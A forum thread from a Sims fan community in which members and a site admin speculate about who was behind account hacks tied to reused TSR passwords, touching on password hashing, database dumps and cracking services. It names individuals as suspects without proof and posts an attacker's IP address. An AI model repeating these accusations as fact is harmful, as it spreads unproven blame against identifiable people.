We have never specified that Thomas himself committed the hackings. In fact, this scenario seems unlikely. The more plausible scenario is that someone, possibly Thomas, possibly someone else, provided the agent who then proceeded to do this with the information needed to carry it out, and then turned them loose, disavowing any responsibility for their actions. While the Buggybooz incident turned out to be somewhat of a disaster, this may not even have been an intended outcome: It is possible that the original information was released for some other purpose, and, well, you can't put the genie back in the bottle.

But Pescado, what you're not seeing is that TSR don't *want* these hacking attacks that could look like TSR-related-originated-assisted to happen as it is bad publicity.  So why would they do them?  It's not like they're getting rid of pirate content, as everyone knows the hacked site owner simply restores the site immediately.  The anti-TSR brigade have far more motive to be doing this - "false flag" you call it?

It could just be that intent aside, being not as good as covering your tracks.  If being forced to watch Smoking Gun presents: World's Dumbest..... most people might think they are being clever, but really aren't.

The intent could just be for the "hacker" to look like they have a big dick. Even if they know they aren't causing permanent damage, they are causing those they believe to be pirates some frustration, which gives them the giggles.

I am a horrible liar, so much so that I haven't even attempted one since I was a new 18. However, I can lie easily and do to my parents. The 'rents think I have a degree. They have seen a copy of this degree. They know the supposed classes I took while I finished said degree. I'd argue that sometimes the easiest people to lie to are family.

That said, I don't think it is Thomas doing the dastardly deeds. I have a few ideas, not limited to Atwa. I have absolutely no proof...just going off of general attitudes I've observed from being on both sides of the fence.

It looks like a pretty good place to get help cracking a password if you have the hash and the salt. Most such requests seems to be answered very fast.
I'm not saying it's easy to get access to a database and obtain the necessary information i'm just saying that IF you do it would be far from impossible to crack the passwords.
Not as easy as plain text passwords of course but doable.

Regardless of the origin, TSR or elsewhere, you would need db access to get the plaintext or hashed password. With or without help of someone with such access.
Not sure i understand what you mean with "make them look like they came from TSR" but if a password is the same on both TSR and some other place there would be no need to massage it to make it look like it came from TSR?



I'm not sure i know what incident you're talking about but i don't think it's the same as i was thinking of.
Multiple FA accounts were affected and AFAIK none of them left us, at least not soon after. This happened at least 2 times.
We gave out the new random passwords in chat but as you say the new password could also have been obtained by the password recovery system we had when passwords were in plaintext. So if someone's email were compromised that would be one way to obtain it.
The relatively large number of accounts affected makes the probability if that scenario rather low though.


You're also saying the following hackings after buggy up until Scotty and Witchboy are linked and follows the same pattern which implies that one of the owners would still supply this agent with passwords.
Since we changed to hashed passwords they can no longer be supplied in plaintext.
In order to obtain the hashed ones you would need to know how to access the database and pull data from it. You would also need to obtain the salt which is store elsewhere.

Me and Per are the only ones that would be able to do that and we didn't.

!!  How secure is that?

Private individual chat of course, don't know if it was irc or skype, perhaps both.

Meaning, in order for someone to use passwords as if they came from TSR, they would have to make sure to ONLY use those that matched TSR passwords. They would thus have to intentionally pass up attack on people whose passwords they had, but could not access from TSR. Additionally, how would they KNOW the passwords matched TSR unless they tried them, and thus made it apparent that this was occurring? Without the knowledge that the passwords actually DID match TSR's passwords, the attack pattern could not be matched to TSR.

2 known incidents are not really relatable. Not every incident of vandalism is through the same vector or related. In fact, if someone really HAD externally compromised your DB, you would be seeing a lot more damage than two isolated wipes of FA accounts.

You say "at least 2". That is not quite a large number, especially in the absence of any other connection. There are plenty of reasons why a password could be compromised in a vacuum without the need to resort to hacking theories, particularly when the vandalism is apparently unrelated, and much of this doesn't even qualify as hacking. Cats and angry siblings can cause plenty of random deletions without any hacking at all.

Or that the old password sheet is still alive and still held by the hacker.

Oh man, that's the second Sim site that got hacked. The other day, I think it was around April last year, I went on Exnem Sims and someone had hacked it completely and deleted ALL the Community Downloads. And when I went into the forums it said "F*** You, This F***ing server is being hacked". Thats all that I remember and the sad part was that Exnem couldn't backup his site. Poor them. However I did manage to have some of the community downloads at the time, so I sent them all what I had to LyricLee.
At last your site has been saved. Exnem's site is completely ruined. :(

Assuming all attacks were made on accounts that had the same password on TSR i can see what you mean. I don't think that is the case though?
Buggy is the only one i know for sure had the same password.



It was two separate attacks where multiple accounts (i think it was 5-10) were compromised.
That was probably not a case of random vandalism, somehow the attacker either found a vulnerability or got a hold of the passwords.

Would be possible if someone got a dump of the whole member table, which couldn't have been done by Thomas.
That he would have compiled a list of selected people he wanted hacked and all the attacks we've seen came from that list sounds unlikely to me.
A complete list of all the "TSR linked" attacks could help shed some light on this, the ones i know of are Buggy, Bluesoup (petition), Scotty and Witchboy.
Did i miss anyone?

The simsecret hacking over at LiveJournal has also been linked to Atwa/TSR, mainly because of IP similarities and the fact that the only posts that were deleted were ones with anti-TSR secrets.

The latter seems more likely. If a true vulnerability existed, it would not have been easy to selectively target data using an SQL or PHP vulnerability, and your attacker would have simply deleted everything. Similarly, admin-level password compromise is thus unlikely, as if someone had an admin password, they would have been able to do far more damage.

Is there a technical reason, other than possibly sheer size, that would have made this impossible?

This does sound excessively laborious, but not impossible, if he selectively compiled anti-paysite activists. The more likely scenario is still whole or partial membertable dumping.

Of the known attacks, the Buggybooz, Shanow, and Scotty attacks are the ones known to me to have confirmed the TSR-password link. There may be others I don't recall offhand, and in none of the unconfirmed cases has this been ruled out as an possibility.

So you printed out a fake degree?? Please tell me you used comic sans.

Nah, that's on my totally for real minister certificate from the Universal Church of Whatever or Such.

e-Peen? It's a surprisingly common motivation for seemingly illogical and counterproductive acts.

Except for the catch: Assuming that TSR is NOT responsible, there is no plausible way an anti-TSR faction could acquire the technical data needed to carry out the attacks AND frame TSR for providing the data, without the complicity of at least one agent inside TSR. So even if they wanted to, they couldn't. In order to catch a large number of usable passwords like this, someone would either need to run a highly sophisticated phishing operation AND a means of verifying that the passwords stolen are shared WITHOUT simply trying them on TSR and thus setting off alarms.

Well, all this theorising on what errors of judgement may have taken place and what loose cannons they may have fired is still firmly in the realms of speculation.   The perp is as unlikely to be brought to justice as PMBD is, and for similar reasons.

What is the desired outcome, and how can this speculation help to bring it about?

Sysadmins - never use the same password on sites you have authority over, or investment in, as you do on ones where you are merely a visitor.   Always change your password and other system details after falling out with a fellow admin, and ensure the ex-admin is removed from *all* his membergroups - or delete his account and ask him to make a new one as a regular user.

Do we know who had the account and if that person had an account on TSR with the same password?

I don't recall which of the former admins it was (sinthe, maybe), but she did admit at the time that she'd used the same username and password on TSR.
The IP info is here. (http://tsr.mustbedestroyed.org/?p=462)

Simsecret posts regarding the hacking are here (http://community.livejournal.com/simsecret/2008/11/17/) and here. (http://community.livejournal.com/simsecret/2008/11/18/)

Yeah i think i'm leaning towards that option too. One strange detail though was that there had been some falied login attempts on some accounts using the wrong random passwords.


Yeah the technical reason being that he wouldn't be able to dump the member table even if he had a GUI db client and the all necessary information to connect to the database, Thomas is a pixel pusher and he doesn't know how that stuff works.
We don't have any functionality to get a list of passwords in admin so he would have had to pick the one by one to compile a list, which due to sheer size is next to impossible.
 

Theoretically possible but then again i have a lot of reason to believe he wouldn't do that. Membertable dump is definitely more likely than that but just as scary.

Has there been attacks where it has been confirmed that the password was not the same as a TSR account?

I've done some digging and from what i can tell it was Sinthe and a shared account (secret poster or something like that) that was compromised.
Some further digging got me to a post on PMBD where Delphy showed a screenshot from Sinthe with the logins, which i assume was for when simsecret got hacked (not sure about that though):
http://phorum.mustnotbenamed.com/index.php/topic,2399.msg141367.html#msg141367

The combination of IP's and useragent defenitley points to the same perpetrator as in the Buggybooz incident.

The user agent for the IP that hacked into SV & GSC is as follows...

IP: 83.170.113.97 User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5

That doesn't mean anything. Random people randomly rattle doors on accounts all the time. This would only be a concern if there was a systemic pattern of door-rattling. Given that you run a paysite, it's entirely reasonable to expect that random people will attempt to rattle the doors on accounts simply to see if they can get any free swag, and people also lose their passwords and try to guess which of the set of usual passwords was the right one. Given the sheer size of your site, hundreds if not thousands of such attempts are probably made every week. The SUSPICIOUS thing would be when a strange IP logged into an account, then did nothing with it, and that account was subsequently attacked elsewhere, meaning that someone was trying to probe for a TSR commonality before attempting an attack.

I dunno about that. I mean, Spilt Pee Soup, a thoroughly nontechnical user, managed to figure out how to use phpmyadmin just fine. Also, there is no guarantee it was Thomas who personally did it. Thomas is the most likely suspect purely based on motives and opportunity, but he isn't the only one who could have done it.

Or, he could dump the entire thing and do a CRTL-F...

The exact methodology by which the information was acquired from the database is really less important than the fact that it clearly had to have been.

No. There have been no negative confirmations where a password-attack was conclusively NOT a TSR account password, only cases where confirmation could not be acquired due to either the user not remembering, or not being present. All other hacking attacks not related or suspected to be related to TSR account passwords have all been dismissed as common vandalism and bear no connection to any community politics.

If you're talkign about Brynne, I don't think she did.   Every time she wanted to look at something she asked someone to do it for her, handing out temporary admin access if necessary.  Lol long after she thought she'd banned me I could have got in the back door.  Fortunately for her I wasn't the shady character she thought I was.